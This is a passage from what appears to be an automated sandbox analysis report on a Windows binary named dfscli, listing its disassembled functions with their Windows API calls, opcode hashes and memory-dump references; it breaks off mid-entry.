                                                                  • Opcode ID: 5231f9cba8860c89ca05e19dafb1a2c24a41461642442fb6cf506ca3b38b4cc7
                                                                  • Instruction ID: b56e1250b5eeb3e03af337cf5b8aade3a6d5dc35aadc41e3464ab86f92864a86
                                                                  • Opcode Fuzzy Hash: 5231f9cba8860c89ca05e19dafb1a2c24a41461642442fb6cf506ca3b38b4cc7
                                                                  • Instruction Fuzzy Hash: B26191706043859FDF21CF58C894BEA7BE4AF11304F1845ABE8518B2D1D378DD95CB5A
                                                                  Function 0040BAD2 Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0040BAF0
                                                                  • GetDesktopWindow.USER32 ref: 0040BB03
                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB16
                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB23
                                                                    • Part of subcall function 00423D5B: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,0040BC64,?,?), ref: 00423D76
                                                                    • Part of subcall function 00423D99: ShowWindow.USER32(?,?,0040BC6D,00000000,?,?), ref: 00423DA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$DesktopMoveShowVisible
                                                                  • String ID:
                                                                  • API String ID: 3835705305-0
                                                                  • Opcode ID: 02730a8dcdf5586f36da1b8026ee27db7f50392f629d12665f502e7a90036cb3
                                                                  • Instruction ID: 0b392027358f973cf9a87025e36c0637855173732e828471bea61ad1e95020aa
                                                                  • Opcode Fuzzy Hash: 02730a8dcdf5586f36da1b8026ee27db7f50392f629d12665f502e7a90036cb3
                                                                  • Instruction Fuzzy Hash: 51510C75A0020AEFDB00DFA9D998CAEB7B9EF48705B14446DF501E7254CB39EE01CB64
                                                                  Function 00415FCF Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strcspn_strlen_strncpy_strpbrk
                                                                  • String ID:
                                                                  • API String ID: 635841138-0
                                                                  • Opcode ID: 4acd2b3da59a346ea89797bb7e0e1b5f04a14f124cc7c14e013e1c037170ab40
                                                                  • Instruction ID: 44dc5c145c95b46dcc10438fb611d3ac7f676edd126e77a362cf6d6368d72d10
                                                                  • Opcode Fuzzy Hash: 4acd2b3da59a346ea89797bb7e0e1b5f04a14f124cc7c14e013e1c037170ab40
                                                                  • Instruction Fuzzy Hash: 90510B76D0421AAADF21DBA59C816FF77A8AB44348F26042FD511A3243E77CCDC1C799
                                                                  Function 00416F27 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0041700F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 96b8e6bb5318c80f56763d940f7dc6e0f4e8b6228f9512b9e20a3a71bbbea6aa
                                                                  • Instruction ID: 6123c53501c71611ec199f00bb1904ad0936d21d6721be59c225a486e99e16bd
                                                                  • Opcode Fuzzy Hash: 96b8e6bb5318c80f56763d940f7dc6e0f4e8b6228f9512b9e20a3a71bbbea6aa
                                                                  • Instruction Fuzzy Hash: F2514E71904348DFDB32CFA9D880AEDBBB8FF49304F21416AE855AB252D7349A81CF15
                                                                  Function 00425954 Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLocklstrlen
                                                                  • String ID:
                                                                  • API String ID: 1144527523-0
                                                                  • Opcode ID: 8169b16f82f0868695eb299ef13228d82f00ca6112b92c9d85447b5b163038f3
                                                                  • Instruction ID: 40d86c0513ae9d415dd9e2a43e2b1b87c3bf4c07422c7a4737d8b13f56130937
                                                                  • Opcode Fuzzy Hash: 8169b16f82f0868695eb299ef13228d82f00ca6112b92c9d85447b5b163038f3
                                                                  • Instruction Fuzzy Hash: 5B41D772A00619EFCB14DFB5D88589EBB78FF04314B50823AE416D7295D7389986CF94
                                                                  Function 00424236 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0042426A
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004242CF
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00424314
                                                                  • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042433D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 578cd5156323f8e4839ee2b7b2deaaf76e5d6958570f61373f7fb0b6f96745cb
                                                                  • Instruction ID: 97a3aa0f2093d80d9ab1d2ca581497d8a10018e442b15fa7111c8de2717619ad
                                                                  • Opcode Fuzzy Hash: 578cd5156323f8e4839ee2b7b2deaaf76e5d6958570f61373f7fb0b6f96745cb
                                                                  • Instruction Fuzzy Hash: D2319230701128EBCB25DF56D880EAF7BA9EF81390F90406BF9059B251DA38DD81DBE4
                                                                  Function 00424DE6 Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000104), ref: 00424E11
                                                                  • GetFileTime.KERNEL32(?,?,?,?), ref: 00424E33
                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 00424E41
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00424E6B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesSizeTimelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1499663573-0
                                                                  • Opcode ID: f16e3736775d2ddd2b90047da77ffea6f1390e20ccceb3cacd56e450c912fe4a
                                                                  • Instruction ID: 10b0ca20b6ba7935ce24b692c837ef30e80ac275a2c3b5174e3ec32f6528bdd3
                                                                  • Opcode Fuzzy Hash: f16e3736775d2ddd2b90047da77ffea6f1390e20ccceb3cacd56e450c912fe4a
                                                                  • Instruction Fuzzy Hash: F6415B71600615DFD724DF64D880CABBBF8FB493247508A2EE1AAD7690E734F905CB68
                                                                  Function 004097DD Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString$ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 3349467263-0
                                                                  • Opcode ID: de6ed19b4d79ffda526f10128478d59beb7b2d2a8770046cbd51498ef92bede6
                                                                  • Instruction ID: 9b7dfb74d6b775aa84bb56406a04f63d893804085adcf5f2a56aebc11390cad7
                                                                  • Opcode Fuzzy Hash: de6ed19b4d79ffda526f10128478d59beb7b2d2a8770046cbd51498ef92bede6
                                                                  • Instruction Fuzzy Hash: 4C314872A11219EFCB10EFA5C884ADEBB78BF09710F10812BF519A7281C774A944CBA4
                                                                  Function 0041AE68 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                    • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
                                                                  • CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041AF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                  • String ID:
                                                                  • API String ID: 1997773198-0
                                                                  • Opcode ID: 2f5a63cc3d85905ba8ff51249218b259c6c2d120b32e42e249fa9abd3c0fdf1d
                                                                  • Instruction ID: 5cd4ba0b02cff2006dfa041284cb0cbfb60364f479d6c6401c1f379f8f18e737
                                                                  • Opcode Fuzzy Hash: 2f5a63cc3d85905ba8ff51249218b259c6c2d120b32e42e249fa9abd3c0fdf1d
                                                                  • Instruction Fuzzy Hash: D031BE71801218EBCF219FA2DC49BDE7B76FF08754F24012AF815A61A0D73889A2DB55
                                                                  Function 00412792 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$___initmbctable_strcat
                                                                  • String ID:
                                                                  • API String ID: 109824703-0
                                                                  • Opcode ID: b85dc8cf1279c79c59f8bd1564ee49a33527450fdaabd89fe6a56b01cf1f63b2
                                                                  • Instruction ID: c412b2b7f8df5d4b9f6b2b75421172ecb2d2693661a7d437f8156438054eadb6
                                                                  • Opcode Fuzzy Hash: b85dc8cf1279c79c59f8bd1564ee49a33527450fdaabd89fe6a56b01cf1f63b2
                                                                  • Instruction Fuzzy Hash: 631127728081016ED7207F65AD405A77785EB313347240A3FE091932E2DA7C18E6C66C
                                                                  Function 00409432 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CreateH_prologIndirectRect
                                                                  • String ID:
                                                                  • API String ID: 2123978231-0
                                                                  • Opcode ID: 4b0f4901dd638a671841a374c8397060b8bf8be129b0859f566eeb39be9f4921
                                                                  • Instruction ID: 7afd8c56d7a45c3c1b9d016defab70745a838345b1ecd9677a25a07ef7e179f5
                                                                  • Opcode Fuzzy Hash: 4b0f4901dd638a671841a374c8397060b8bf8be129b0859f566eeb39be9f4921
                                                                  • Instruction Fuzzy Hash: BF215C71A00129DBCB11DFA4D98499EB7B8EF08714F5081A6E901BB295C7789E06CBB5
                                                                  Function 0040A5FC Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ArrayDestroyFreeSafeTask
                                                                  • String ID:
                                                                  • API String ID: 3253174383-0
                                                                  • Opcode ID: bb55eb5cadc817f2e48f085d3486655d5a4389d2a61a639251d8b891ef80dd51
                                                                  • Instruction ID: a1dea07ca2ec4367596b7633afa73df90ca84adeb2077ed1b3f452afad63676a
                                                                  • Opcode Fuzzy Hash: bb55eb5cadc817f2e48f085d3486655d5a4389d2a61a639251d8b891ef80dd51
                                                                  • Instruction Fuzzy Hash: 05115E30600305DBDB259F65D848B6677B8AF00741F1D0A3AE8C5AA2E0DB3ADD21CA5E
                                                                  Function 0040957A Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EqualH_prologIntersect
                                                                  • String ID:
                                                                  • API String ID: 2227276553-0
                                                                  • Opcode ID: cfe4538af5ce4241f94f36a5d2e894a6c0f0bd8464d49d8081b223b50ccd3408
                                                                  • Instruction ID: 913515354d6a92e134cf8808074a3165ff7f6a37c3e08295266c1903fc249c36
                                                                  • Opcode Fuzzy Hash: cfe4538af5ce4241f94f36a5d2e894a6c0f0bd8464d49d8081b223b50ccd3408
                                                                  • Instruction Fuzzy Hash: 2C212C72A00219EFDB11EF95D984DDEBBB8FF08354B10456AF951A3250D7389E058B64
                                                                  Function 0042028C Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004202B2
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004202BA
                                                                  • LockResource.KERNEL32(00000000), ref: 004202CC
                                                                  • FreeResource.KERNEL32(00000000), ref: 00420316
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  • Opcode ID: 0b83120d772461038e2049ec577641a88b61bf73e8f1d9011b83d9a047eaa24e
                                                                  • Instruction ID: 656d2c210f5b5afbe86cf1a99f8a29c5f19edac70fe617a666d0c49f05aa73d5
                                                                  • Opcode Fuzzy Hash: 0b83120d772461038e2049ec577641a88b61bf73e8f1d9011b83d9a047eaa24e
                                                                  • Instruction Fuzzy Hash: 67119D3A601721EFCB24DFA5E948AA7B7B8FB04754F80446AE80253752E778AC05CB74
                                                                  Function 00423181 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231AB
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231CD
                                                                  • GetCapture.USER32 ref: 004231DF
                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004231EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Capture
                                                                  • String ID:
                                                                  • API String ID: 1665607226-0
                                                                  • Opcode ID: 7db1d9e71e75495c4d9147a9e900ecf5cbacbe0365e999608e3c3560ea6febca
                                                                  • Instruction ID: f54eaa0953af14796ca2798ad8be5b391c5598d7a46c12b9b30925c7b8ab6a99
                                                                  • Opcode Fuzzy Hash: 7db1d9e71e75495c4d9147a9e900ecf5cbacbe0365e999608e3c3560ea6febca
                                                                  • Instruction Fuzzy Hash: 1E016D713403197FFA302B15ACC9FBB76ADDF88789F910439F241AB2D2CA959C059A64
                                                                  Function 004249C5 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004249F9
                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 004249FF
                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00424A02
                                                                  • GetLastError.KERNEL32(?), ref: 00424A1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                  • String ID:
                                                                  • API String ID: 3907606552-0
                                                                  • Opcode ID: e60f49e3c131c40013d4e8fd54a17e3d401a2657e5a6576110243408ecd1152f
                                                                  • Instruction ID: 8ac3f6cd50cf8df22ad13eb24bf5b481f7bec5be52e842199ecbcbeb8f3ca53e
                                                                  • Opcode Fuzzy Hash: e60f49e3c131c40013d4e8fd54a17e3d401a2657e5a6576110243408ecd1152f
                                                                  • Instruction Fuzzy Hash: 1C012471700210BBDB20AFB6EC49F1B7BADEF84360F608026F915CB281DA74DC018764
                                                                  Function 0042C03B Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • htonl.WS2_32(00000000), ref: 0042C075
                                                                  • htons.WS2_32(?), ref: 0042C081
                                                                    • Part of subcall function 0040422C: bind.WS2_32(?,00000002,00000002), ref: 00404237
                                                                  • inet_addr.WS2_32(?), ref: 0042C0B3
                                                                  • WSASetLastError.WS2_32(00002726), ref: 0042C0C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastbindhtonlhtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3045141626-0
                                                                  • Opcode ID: fdd929dac27bfb8b269abb1e6dbd06ae9421f0aed8c90508c6ae5c3d1d7e3271
                                                                  • Instruction ID: bb8df0c29fff26a21c7ebcb5d6223e386f4c65aafe457ce3011b1e801e2c3432
                                                                  • Opcode Fuzzy Hash: fdd929dac27bfb8b269abb1e6dbd06ae9421f0aed8c90508c6ae5c3d1d7e3271
                                                                  • Instruction Fuzzy Hash: D2018831A00118ABCB10EBE5E84599FBBB8AF44354F500526F505E7291DB785A45C7DA
                                                                  Function 00422618 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTopWindow.USER32(?), ref: 00422626
                                                                  • GetTopWindow.USER32(00000000), ref: 00422665
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00422683
                                                                  Memory Dump Source
